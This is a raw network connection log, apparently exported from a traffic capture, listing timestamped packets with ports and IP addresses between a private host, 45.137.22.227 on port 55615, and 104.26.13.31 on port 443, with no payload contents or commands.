Jan 22, 2025 14:12:01.048774004 CET	49734	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:01.053765059 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:01.394694090 CET	49734	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:01.399822950 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:01.687036991 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:01.738281965 CET	49734	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:06.743590117 CET	49734	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:06.743590117 CET	49734	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:06.748944998 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:06.749044895 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:06.917927980 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:06.972750902 CET	49734	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:07.018158913 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:07.018182039 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:07.018197060 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:07.018212080 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:07.018229961 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:07.018501043 CET	49734	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:07.071409941 CET	49737	443	192.168.2.4	104.26.13.31
Jan 22, 2025 14:12:07.071453094 CET	443	49737	104.26.13.31	192.168.2.4
Jan 22, 2025 14:12:07.071527004 CET	49737	443	192.168.2.4	104.26.13.31
Jan 22, 2025 14:12:07.078041077 CET	49737	443	192.168.2.4	104.26.13.31
Jan 22, 2025 14:12:07.078063965 CET	443	49737	104.26.13.31	192.168.2.4
Jan 22, 2025 14:12:07.546587944 CET	443	49737	104.26.13.31	192.168.2.4
Jan 22, 2025 14:12:07.546794891 CET	49737	443	192.168.2.4	104.26.13.31
Jan 22, 2025 14:12:07.552067995 CET	49737	443	192.168.2.4	104.26.13.31
Jan 22, 2025 14:12:07.552088022 CET	443	49737	104.26.13.31	192.168.2.4
Jan 22, 2025 14:12:07.552578926 CET	443	49737	104.26.13.31	192.168.2.4
Jan 22, 2025 14:12:07.597734928 CET	49737	443	192.168.2.4	104.26.13.31
Jan 22, 2025 14:12:07.609914064 CET	49737	443	192.168.2.4	104.26.13.31
Jan 22, 2025 14:12:07.655323982 CET	443	49737	104.26.13.31	192.168.2.4
Jan 22, 2025 14:12:07.963110924 CET	443	49737	104.26.13.31	192.168.2.4
Jan 22, 2025 14:12:07.963351965 CET	443	49737	104.26.13.31	192.168.2.4
Jan 22, 2025 14:12:07.963423967 CET	49737	443	192.168.2.4	104.26.13.31
Jan 22, 2025 14:12:07.966509104 CET	49737	443	192.168.2.4	104.26.13.31
Jan 22, 2025 14:12:11.331116915 CET	49734	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.331377983 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.336369038 CET	55615	49734	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.336412907 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.336452961 CET	49734	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.336487055 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.337038040 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.341943979 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.691726923 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.697042942 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.697077990 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.697105885 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.697113991 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.697128057 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.697139978 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.697154045 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.697168112 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.697195053 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.697221041 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.697221041 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.697241068 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.697248936 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.697266102 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.697276115 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.697298050 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.697303057 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.697324991 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.697350025 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.702213049 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.702276945 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.702305079 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.702367067 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.702394009 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.702441931 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.702455997 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.702469110 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.702493906 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.702496052 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.702518940 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.702550888 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.744770050 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.744859934 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.744915009 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.792789936 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.792851925 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.844734907 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.844805002 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.881825924 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.882019043 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887096882 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887161016 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887212038 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887240887 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887265921 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887284994 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887336969 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887429953 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887484074 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887506962 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887537003 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887538910 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887576103 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887620926 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887624025 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887666941 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887666941 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887701035 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887721062 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887736082 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887763977 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887790918 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887818098 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887820005 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887845039 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887856007 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887875080 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.887928963 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.887948036 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.888072014 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.888076067 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.888159037 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.888247013 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.888320923 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.892915964 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.892987967 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.893122911 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.893153906 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.893197060 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.893213034 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.893460035 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.893543005 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.893544912 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.893599987 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.893625975 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.893668890 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.893687963 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.893762112 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.893783092 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.893855095 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.893904924 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.893933058 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.893964052 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.893987894 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894026995 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894076109 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894088984 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894124031 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894124985 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894176006 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894184113 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894203901 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894232035 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894234896 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894259930 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894289017 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894295931 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894324064 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894354105 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894378901 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894380093 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894407034 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894442081 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894443035 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894484997 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894500017 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894511938 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894541025 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894556999 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894583941 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894584894 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894629002 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894630909 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894655943 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894679070 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894696951 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894705057 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894732952 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894732952 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894757032 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894764900 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894808054 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894836903 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894855022 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894908905 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894922018 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894936085 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894963026 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.894968987 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.894992113 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895004988 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895020008 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895031929 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895047903 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895054102 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895076036 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895087004 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895103931 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895123005 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895131111 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895147085 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895158052 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895184040 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895184994 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895198107 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895212889 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895235062 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895240068 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895267010 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895267963 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895298958 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895323992 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895373106 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895421982 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895432949 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895450115 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.895481110 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.895509958 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.898017883 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.898088932 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.898185015 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.898255110 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.900439978 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.900515079 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.900518894 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.900566101 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.900593042 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.900623083 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.900629997 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.900682926 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.900717020 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.900770903 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.900784016 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.900830984 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.900846958 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.900859118 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.900906086 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.900960922 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.900974035 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901030064 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901041985 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.901057005 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901083946 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901110888 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901127100 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.901153088 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.901181936 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.901315928 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901392937 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.901423931 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901452065 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901484013 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.901509047 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.901618958 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901690006 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.901712894 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901772022 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.901827097 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901875019 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901889086 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.901911974 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.901932955 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.901989937 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902000904 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902028084 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902062893 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902160883 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902172089 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902223110 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902231932 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902259111 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902292013 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902331114 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902364969 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902391911 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902425051 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902420044 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902451992 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902481079 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902498960 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902508974 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902537107 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902540922 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902566910 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902569056 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902595043 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902597904 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902623892 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902626991 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902652025 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902667046 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902682066 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902682066 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902708054 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902712107 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902740002 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902749062 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902766943 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902776957 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902806044 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902817011 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902836084 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902857065 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902872086 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902884960 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902913094 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902920961 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902940035 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.902956009 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.902982950 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903006077 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903011084 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903038979 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903070927 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903090000 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903098106 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903117895 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903150082 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903162003 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903181076 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903189898 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903217077 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903218031 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903244972 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903254032 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903273106 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903278112 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903301001 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903304100 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903328896 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903348923 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903358936 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903377056 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903400898 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903404951 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903433084 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903440952 CET	49738	55615	192.168.2.4	45.137.22.227
Jan 22, 2025 14:12:11.903460026 CET	55615	49738	45.137.22.227	192.168.2.4
Jan 22, 2025 14:12:11.903465986 CET	49738	55615	192.168.2.4	45.137.22.227
